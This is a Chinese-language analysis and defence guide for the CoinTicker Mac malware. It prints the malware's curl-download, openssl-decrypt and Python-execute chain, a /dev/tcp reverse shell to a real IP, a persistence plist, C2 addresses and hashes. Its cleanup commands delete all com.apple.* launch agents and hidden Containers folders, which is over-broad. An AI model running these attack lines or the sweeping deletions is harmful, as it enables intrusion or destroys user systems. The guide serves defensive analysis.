CoinTicker恶意软件分析报告与防御指南<\/h1>

1. 恶意软件概述<\/h2>
CoinTicker是一款伪装成加密货币价格追踪工具的Mac应用程序，实际上会在用户不知情的情况下安装两个开源后门：EvilOSX和EggShell。<\/p>

1.1 恶意软件特点<\/h3>

不需要用户权限或root权限即可运行<\/li>
使用合法的功能作为掩护<\/li>
通过GitHub托管恶意载荷<\/li>
创建持久化机制确保长期驻留<\/li>

使用加密技术隐藏恶意行为<\/li> <\/ul>

2. 恶意行为分析<\/h2>

2.1 初始感染流程<\/h3>

用户下载并安装CoinTicker应用<\/li>

应用启动后，执行以下shell命令：<\/li> <\/ol>

nohup curl -k -L -o \/tmp\/.info.enc https:\/\/github.com\/youarenick\/newProject\/raw\/master\/info.enc; 
<\/span><\/span>openssl enc -aes-256-cbc -d -in \/tmp\/.info.enc -out \/tmp\/.info.py -k 111111qq; 
<\/span><\/span>python \/tmp\/.info.py
<\/span><\/span><\/code><\/pre>2.2 载荷分析<\/h3>
2.2.1 EggShell后门组件<\/h4>

从GitHub下载加密文件并解密为Python脚本<\/li>
建立反向shell连接：<\/li>
<\/ul>
nohup bash &> \/dev\/tcp\/94.156.189.77\/2280 0>&1<\/span>
<\/span><\/span><\/code><\/pre>
下载EggShell二进制文件到\/tmp\/espl<\/code><\/li>
创建并执行shell脚本\/tmp\/.server.sh<\/code><\/li>
<\/ul>
2.2.2 EvilOSX后门组件<\/h4>

在~\/Library\/Containers\/<\/code>目录下创建隐藏文件夹和随机命名的Python脚本<\/li>
使用动态生成的UID作为解密密钥<\/li>
修改后的bot.py脚本与C2服务器(185.206.144.226:1339)通信<\/li>
<\/ul>
2.3 持久化机制<\/h3>

创建用户启动代理.espl.plist<\/code>：<\/li>
<\/ol>
<?xml version="1.0" encoding="UTF-8"?><\/span>
<\/span><\/span><!DOCTYPE plist PUBLIC "-\/\/Apple\/\/DTD PLIST 1.0\/\/EN" "http:\/\/www.apple.com\/DTDs\/PropertyList-1.0.dtd"><\/span>
<\/span><\/span><plist<\/span> version=<\/span>"1.0"<\/span>><\/span>
<\/span><\/span><dict><\/span>
<\/span><\/span>    <key><\/span>AbandonProcessGroup<\/key><\/span>
<\/span><\/span>    <true\/><\/span>
<\/span><\/span>    <key><\/span>Label<\/key><\/span>
<\/span><\/span>    <string><\/span>com.apple.espl<\/string><\/span>
<\/span><\/span>    <key><\/span>ProgramArguments<\/key><\/span>
<\/span><\/span>    <array><\/span>
<\/span><\/span>        <string><\/span>sh<\/string><\/span>
<\/span><\/span>        <string><\/span>-c<\/string><\/span>
<\/span><\/span>        <string><\/span>nohup curl -k -L -o \/tmp\/.info.enc https:\/\/github.com\/youarenick\/newProject\/raw\/master\/info.enc; openssl enc -aes-256-cbc -d -in \/tmp\/.info.enc -out \/tmp\/.info.py -k 111111qq; python \/tmp\/.info.py<\/string><\/span>
<\/span><\/span>    <\/array><\/span>
<\/span><\/span>    <key><\/span>RunAtLoad<\/key><\/span>
<\/span><\/span>    <true\/><\/span>
<\/span><\/span>    <key><\/span>StartInterval<\/key><\/span>
<\/span><\/span>    <integer><\/span>90<\/integer><\/span>
<\/span><\/span><\/dict><\/span>
<\/span><\/span><\/plist><\/span>
<\/span><\/span><\/code><\/pre>
创建随机命名的启动代理com.apple.[random string].plist<\/code><\/li>
<\/ol>
3. 技术细节<\/h2>
3.1 文件系统变化<\/h3>
恶意软件创建以下文件和目录：<\/p>

\/private\/tmp\/.info.enc<\/code><\/li>
\/private\/tmp\/.info.py<\/code><\/li>
\/private\/tmp\/.server.sh<\/code><\/li>
\/private\/tmp\/espl<\/code><\/li>
~\/Library\/LaunchAgents\/.espl.plist<\/code><\/li>
~\/Library\/LaunchAgents\/com.apple.[random string].plist<\/code><\/li>
~\/Library\/Containers\/.[random string]\/[random string]<\/code><\/li>
<\/ul>
3.2 网络活动<\/h3>
恶意软件连接以下C2服务器：<\/p>

94.156.189.77:2280 (seednode3.parsicoin.net)<\/li>
185.206.144.226:1339<\/li>
<\/ul>
3.3 加密技术<\/h3>

使用AES-256-CBC加密恶意载荷<\/li>
使用固定密钥"111111qq"或动态生成的UID作为解密密钥<\/li>
使用OpenSSL工具进行加解密操作<\/li>
<\/ul>
4. 检测与防御<\/h2>
4.1 检测方法<\/h3>


检查以下目录是否存在可疑文件：<\/p>

\/private\/tmp\/<\/code>目录下的.info.enc<\/code>、.info.py<\/code>、.server.sh<\/code>和espl<\/code><\/li>
~\/Library\/LaunchAgents\/<\/code>目录下的.espl.plist<\/code>和随机命名的plist文件<\/li>
~\/Library\/Containers\/<\/code>目录下的隐藏文件夹<\/li>
<\/ul>
<\/li>

监控网络连接：<\/p>

检查与94.156.189.77和185.206.144.226的连接<\/li>
<\/ul>
<\/li>

使用SHA-256哈希值验证：<\/p>

CoinTicker.zip: f4f45e16dd276b948dedd8a5f8d55c9e1e60884b9fe00143cb092eed693cddc4<\/li>
espl: efb5b32f87bfd6089912073cb33850c58640d59cb52d8c63853d97b4771bc490<\/li>
<\/ul>
<\/li>
<\/ol>
4.2 防御措施<\/h3>


应用来源控制：<\/p>

仅从官方App Store或可信来源下载应用<\/li>
警惕与coin-sticker.com等新注册域名的交互<\/li>
<\/ul>
<\/li>

权限管理：<\/p>

定期检查~\/Library\/LaunchAgents\/<\/code>目录<\/li>
监控应用程序的网络访问权限<\/li>
<\/ul>
<\/li>

安全工具：<\/p>

使用Malwarebytes等专业安全软件进行扫描<\/li>
启用防火墙并监控异常出站连接<\/li>
<\/ul>
<\/li>

系统加固：<\/p>

定期更新操作系统和安全补丁<\/li>
限制对\/tmp目录的写入和执行权限<\/li>
<\/ul>
<\/li>
<\/ol>
5. 清除指南<\/h2>

终止恶意进程：<\/li>
<\/ol>
ps aux | grep -E 'info.py|espl|server.sh'<\/span> | awk '{print $2}'<\/span> | xargs kill -9
<\/span><\/span><\/code><\/pre>
删除恶意文件：<\/li>
<\/ol>
rm -f \/private\/tmp\/.info.enc \/private\/tmp\/.info.py \/private\/tmp\/.server.sh \/private\/tmp\/espl
<\/span><\/span>rm -f ~\/Library\/LaunchAgents\/.espl.plist
<\/span><\/span>rm -f ~\/Library\/LaunchAgents\/com.apple.*.plist
<\/span><\/span>rm -rf ~\/Library\/Containers\/.*\/
<\/span><\/span><\/code><\/pre>
清除持久化项：<\/li>
<\/ol>
launchctl remove com.apple.espl
<\/span><\/span>for<\/span> label in $(<\/span>launchctl list | grep 'com.apple.'<\/span> | awk '{print $3}'<\/span>)<\/span>; do<\/span> launchctl remove $label; done<\/span>
<\/span><\/span><\/code><\/pre>
重启系统并验证清除效果<\/li>
<\/ol>
6. 总结<\/h2>
CoinTicker恶意软件展示了现代Mac恶意软件的典型特征：<\/p>

使用合法功能作为掩护<\/li>
利用开源后门工具<\/li>
不需要高权限即可造成危害<\/li>
使用加密和混淆技术逃避检测<\/li>
建立多重持久化机制<\/li>
<\/ul>
此案例强调了即使是不需要特殊权限的应用也可能构成严重威胁，用户应始终保持警惕，定期检查系统异常行为。<\/p>

CoinTicker恶意软件分析报告与防御指南<\/h1>

1. 恶意软件概述<\/h2> CoinTicker是一款伪装成加密货币价格追踪工具的Mac应用程序，实际上会在用户不知情的情况下安装两个开源后门：EvilOSX和EggShell。<\/p>

2. 恶意行为分析<\/h2>

2.2 载荷分析<\/h3>

3. 技术细节<\/h2>

4. 检测与防御<\/h2>

1. 恶意软件概述<\/h2>
CoinTicker是一款伪装成加密货币价格追踪工具的Mac应用程序，实际上会在用户不知情的情况下安装两个开源后门：EvilOSX和EggShell。<\/p>